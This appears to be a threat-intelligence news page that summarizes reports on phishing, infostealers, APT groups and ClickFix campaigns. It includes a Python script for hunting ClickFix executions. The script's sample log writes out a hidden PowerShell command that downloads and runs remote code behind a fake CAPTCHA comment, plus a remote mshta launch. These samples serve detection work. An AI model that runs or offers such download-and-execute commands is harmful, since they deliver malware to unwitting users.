Browser Security Under Siege: The Alarming Rise of AI-Powered Phishing
Summary: Browser security is becoming increasingly critical due to a 140% rise in phishing attacks, primarily fueled by zero-day vulnerabilities and advancements in generative AI used by cybercriminals. As attackers adopt sophisticated techniques akin to professional engineering, the risk of browser-based phishing is expected to escalate dramatically moving into 2025.…

Summary: The video discusses a wide range of security topics, including the age verification dilemma, a bogus-employee scheme tied to North Korea, a supposed Bluetooth backdoor discovered in popular chips, and what these findings mean in the broader context of cybersecurity. Steve Gibson, the host, explains what the undocumented commands found in the Bluetooth chips actually do and why describing them as a true "backdoor" is a misinterpretation.…
SideWinder Threat Group: Maritime and Nuclear Sectors at Risk with Updated Toolset
SideWinder, also known as Rattlesnake or T-APT-04, is an India-linked advanced persistent threat group active since 2012 that has expanded its operations to target maritime and nuclear sectors across Asia, the Middle East, and Africa. Known for quickly adapting to security measures, SideWinder employs an evolving set of tactics, techniques, and procedures (TTPs), primarily phishing and malware, to execute sophisticated cyber-attacks.…
A Deep Dive into Strela Stealer and How It Targets European Countries
The Strela Stealer is a targeted infostealer malware that primarily focuses on extracting email credentials from users of Mozilla Thunderbird and Microsoft Outlook in select European countries. Delivered through phishing campaigns, it employs sophisticated social engineering techniques to trick victims into executing its payload. The malware’s infrastructure is linked to Russian hosting services, and it utilizes complex obfuscation methods to evade detection.…
GrassCall Campaign: The Hackers Behind Job Recruitment Cyber Scams
The “GrassCall” malware campaign is an advanced social engineering attack targeting job seekers in the cryptocurrency and Web3 sectors, orchestrated by the Russian cybercriminal organization “Crazy Evil.” Utilizing fake job interviews, the attackers compromise systems to steal cryptocurrency assets, resulting in hundreds of victims. Affected: cryptocurrency sector, job seekers

Key points:

The GrassCall malware campaign is led by the Russian-speaking cyber-criminal organization “Crazy Evil.”…
Summary: As March Madness approaches, the excitement surrounding the NCAA basketball tournaments also attracts threat actors looking to exploit ticket sales and associated scams. The tournament’s emotional stakes, combined with the urgency of purchasing tickets, increase vulnerabilities, requiring heightened security measures. Collaboration and threat intelligence sharing among organizations are crucial to mitigate risks and combat sophisticated attacks targeting fans and businesses alike.…
Phishing campaign impersonates Booking dot com delivers a suite of credential stealing malware
A phishing campaign impersonating Booking.com has been identified targeting organizations within the hospitality sector, particularly in relation to travel. Using the ClickFix social engineering technique, this campaign seeks to steal credentials and engage in financial fraud, affecting various regions including North America and Europe. Affected: hospitality industry, Booking.com…
BitM Up! Session Stealing in Seconds Using the Browser-in-the-Middle Technique
The article discusses the growing threat of Browser-in-the-Middle (BitM) attacks, which let an adversary compromise user sessions across many web applications within seconds by relaying the victim's login through an attacker-controlled browser. Multi-factor authentication (MFA) remains critical, but because BitM captures the session token issued after a successful login rather than the credentials themselves, social engineering that lures the victim into the attacker's browser is enough to bypass it. To counter this, organizations are urged to deploy phishing-resistant defenses such as hardware-based MFA, client certificates, and FIDO2.…
Major Cyber Attacks in Review: February 2025
In February 2025, multiple significant cyber incidents revealed ongoing risks across various industries worldwide. Notable attacks included the Qilin ransomware incident at Lee Enterprises, which disrupted media distribution, and a $1.5 billion cryptocurrency theft attributed to North Korea's Lazarus Group. Breaches at DISA Global Solutions, Orange, and LANIT highlighted severe vulnerabilities in the finance, telecom, healthcare, media, and government sectors.…
⚡ THN Weekly Recap: Router Hacks, PyPI Attacks, New Ransomware Decryptor, and More
Summary: This week’s cybersecurity report highlights the evolving landscape of cyber threats, including advanced techniques used by threat groups and rising supply chain vulnerabilities. Law enforcement efforts against cybercriminal networks show promise, while new exploits and vulnerabilities demand prompt attention from organizations. The report includes notable incidents, emerging attack methods, and critical vulnerabilities that security teams should prioritize.…
100 Car Dealerships Hit by Supply Chain Attack
Summary: A supply chain attack compromised LES Automotive, a service provider used by car dealerships, causing over 100 dealership websites to serve malicious ClickFix code to their visitors. The lure uses social engineering to prompt users into executing harmful commands themselves. ClickFix campaigns have increasingly targeted a range of sectors, including the automotive and hospitality industries.…
Jaguar Land Rover Breached by HELLCAT Ransomware Group Using Its Infostealer Playbook—Then a Second Hacker Strikes
In a significant data breach, the HELLCAT ransomware group has leaked gigabytes of sensitive data from Jaguar Land Rover (JLR), using Jira credentials that infostealer malware had harvested from infected employee machines. The attack underscores the ongoing threat of infostealers and shows how stolen credentials can remain usable for exploitation long after the initial infection.…
Malicious Adobe, DocuSign OAuth apps target Microsoft 365 accounts
Summary: Cybercriminals are using fraudulent Microsoft OAuth applications that impersonate Adobe and DocuSign to distribute malware and capture Microsoft 365 credentials. Proofpoint researchers describe the attacks as highly targeted, characterized by deceptive email campaigns aimed at various industries. Users are advised to treat OAuth consent requests with suspicion and to verify an app's authenticity before granting it permissions.…
Threat Actor Impersonates Booking.com in Phishing Scheme
Summary: Microsoft has reported on a phishing technique dubbed "ClickFix," used by a threat actor tracked as Storm-1865, which exploits victims' instinct to fix a problem themselves: a fake error or verification prompt instructs them to run a command that downloads malware. The campaign primarily targets the hospitality sector, impersonating Booking.com to deceive users into executing the commands that fetch the payload.…
Phishing campaign impersonates Booking dot com delivers a suite of credential stealing malware
A phishing campaign identified by Microsoft Threat Intelligence targets the hospitality industry, impersonating Booking.com and utilizing the ClickFix social engineering technique to deliver credential-stealing malware. The campaign, ongoing since December 2024, aims at financial fraud by tricking users into executing malicious commands. Affected: hospitality organizations, Booking.com…
Summary: Since August 2024, state-sponsored hackers and cybercriminals alike have been using the ClickFix technique to deploy information-stealing malware. The method relies on social engineering delivered through malicious JavaScript on a web page, which manipulates users into copying and executing harmful commands on their own machines. Group-IB reports an increase in this attack vector, particularly against users of platforms offering free content or software.…
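The ClickFix chain described in the Booking.com, Group-IB and car-dealership items above ends the same way every time: the victim pastes a command into the Windows Run dialog or a terminal, so explorer.exe spawns an interpreter with a command line that fetches and runs remote content. The following hunt over process-creation telemetry is an added example written for this page, not code from Microsoft, Group-IB or any of the summarized reports. The log records, field names and IP addresses are constructed for the example, and the "verification" comment pattern is an assumption based on commonly reported lure text rather than a signature from any specific campaign.

```python
"""Hunt for ClickFix-style executions in process-creation logs.

Added example (not from any of the summarized reports). The telemetry
below is constructed to resemble Sysmon Event ID 1 / Windows 4688
fields; the tab-separated key=value layout is an assumption, not a
product schema.
"""
import re
from dataclasses import dataclass

# Interpreters a pasted ClickFix command typically lands in.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
# explorer.exe hosts the Win+R Run dialog, i.e. a human pasted the command.
USER_LAUNCHERS = {"explorer.exe"}

# Command-line tells. Leading (?:^|\s) instead of \b because "-" is not a
# word character and \b would not anchor before it.
SUSPICIOUS = [
    ("encoded command", re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\b", re.I)),
    ("hidden window", re.compile(r"(?:^|\s)[-/]w(?:indowstyle)?\s+hidden\b", re.I)),
    ("in-memory execution", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("download primitive", re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|curl|bitsadmin)\b", re.I)),
    ("remote URL", re.compile(r"https?://", re.I)),
    ("mshta remote content", re.compile(r"mshta(?:\.exe)?\s+(?:https?:|vbscript:|javascript:)", re.I)),
    # Assumed lure text: a trailing comment so the Run box shows "I am not a robot".
    ("captcha lure comment", re.compile(r"#.*(?:captcha|verif|not a robot)", re.I)),
]


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_log(text: str) -> list[ProcEvent]:
    """Parse tab-separated key=value records (constructed format)."""
    events = []
    for line in text.strip().splitlines():
        fields = dict(kv.split("=", 1) for kv in line.split("\t"))
        events.append(ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"]))
    return events


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). Non-interpreter processes score 0."""
    if basename(ev.image) not in INTERPRETERS:
        return 0, []
    reasons = []
    if basename(ev.parent_image) in USER_LAUNCHERS:
        reasons.append("interactive launch from explorer.exe")
    reasons += [name for name, pat in SUSPICIOUS if pat.search(ev.command_line)]
    return len(reasons), reasons


def find_clickfix(events: list[ProcEvent], threshold: int = 2) -> list[tuple[ProcEvent, list[str]]]:
    """Flag interpreters launched from explorer.exe with >= threshold tells.

    Requiring the explorer.exe parent keeps scheduled-task and admin scripts
    (svchost.exe / services.exe parents) out of the hit list.
    """
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if basename(ev.parent_image) in USER_LAUNCHERS and score >= threshold:
            hits.append((ev, reasons))
    return hits


# Constructed sample telemetry: two ClickFix-style launches, one benign
# scheduled task, one benign interactive cmd, one non-interpreter process.
SAMPLE_LOG = "\n".join([
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -w hidden -c \"iex (iwr 'http://198.51.100.7/x').Content\" # I am not a robot - reCAPTCHA Verification ID: 4213",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\mshta.exe"
    "\tCommandLine=mshta https://203.0.113.5/verify.hta",
    "ParentImage=C:\\Windows\\System32\\svchost.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\cmd.exe\tCommandLine=cmd /c dir",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\notepad.exe\tCommandLine=notepad.exe notes.txt",
])


def demo() -> list[tuple[ProcEvent, list[str]]]:
    hits = find_clickfix(parse_log(SAMPLE_LOG))
    for ev, reasons in hits:
        print(f"[ClickFix?] {basename(ev.image)} <- {basename(ev.parent_image)}: {', '.join(reasons)}")
    return hits


if __name__ == "__main__":
    demo()
```

The threshold of two tells on top of the explorer.exe parent is deliberate: an interactive `cmd /c dir` scores one and stays quiet, while the mshta launch scores three (explorer parent, remote URL, mshta fetching http) and the PowerShell one scores six. On a real estate the same logic applies to Sysmon Event ID 1 or 4688 with command-line auditing enabled; the RunMRU registry key is a complementary forensic source for what was pasted into Win+R.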
SocGholish’s Intrusion Techniques Facilitate Distribution of RansomHub Ransomware
Trend Research's analysis of SocGholish's malware-as-a-service (MaaS) framework highlights its central role in delivering RansomHub ransomware via compromised websites. Using heavily obfuscated JavaScript loaders, SocGholish evades detection and carries out its tasks on the victim host. Notably, the framework provides the initial access on which the ransomware attacks are built, mainly affecting government entities in the United States.…
OBSCURE#BAT Malware Uses Fake CAPTCHA Pages to Deploy Rootkit r77 and Evade Detection
Summary: A new malware campaign, dubbed OBSCURE#BAT, deploys an open-source rootkit called r77 through social engineering tactics, primarily targeting English-speaking users in the US, Canada, Germany, and the UK. The campaign utilizes obfuscated Windows batch scripts and PowerShell commands to establish persistence while evading detection. Security researchers highlighted its ability to masquerade as legitimate software and employ various misleading strategies to lure victims into executing the malicious scripts.…